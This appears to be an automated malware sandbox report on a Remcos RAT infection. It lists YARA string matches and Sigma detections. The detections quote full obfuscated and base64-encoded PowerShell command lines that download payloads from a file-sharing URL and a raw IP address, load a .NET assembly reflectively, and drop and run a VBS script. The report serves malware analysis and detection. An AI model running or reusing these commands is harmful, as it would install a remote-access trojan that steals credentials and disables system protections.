              Click to see the 10 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              34.2.CasPol.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                34.2.CasPol.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  34.2.CasPol.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    34.2.CasPol.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6aaf8:$a1: Remcos restarted by watchdog!
                    • 0x6b070:$a3: %02i:%02i:%02i:%03i
                    34.2.CasPol.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x64e04:$str_b2: Executing file:
                    • 0x65c3c:$str_b3: GetDirectListeningPort
                    • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x65780:$str_b7: \update.vbs
                    • 0x64e2c:$str_b9: Downloaded file:
                    • 0x64e18:$str_b10: Downloading file:
                    • 0x64ebc:$str_b12: Failed to upload file:
                    • 0x65c04:$str_b13: StartForward
                    • 0x65c24:$str_b14: StopForward
                    • 0x656d8:$str_b15: fso.DeleteFile "
                    • 0x6566c:$str_b16: On Error Resume Next
                    • 0x65708:$str_b17: fso.DeleteFolder "
                    • 0x64eac:$str_b18: Uploaded file:
                    • 0x64e6c:$str_b19: Unable to delete:
                    • 0x656a0:$str_b20: while fso.FileExists("
                    • 0x65349:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 7 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Base64 Encoded PowerShell Command Detected
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydw
                    Sigma detected: File With Uncommon Extension Created By An Office Application
                    Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3552, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswhichgivingbestopportunities[1].hta
                    Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
                    Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+
                    Sigma detected: Potential PowerShell Command Line Obfuscation
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+
                    Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+
                    Sigma detected: Potentially Suspicious PowerShell Child Processes
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3976, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , ProcessId: 892, ProcessName: wscript.exe
                    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydw
                    Sigma detected: Suspicious MSHTA Child Process
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; 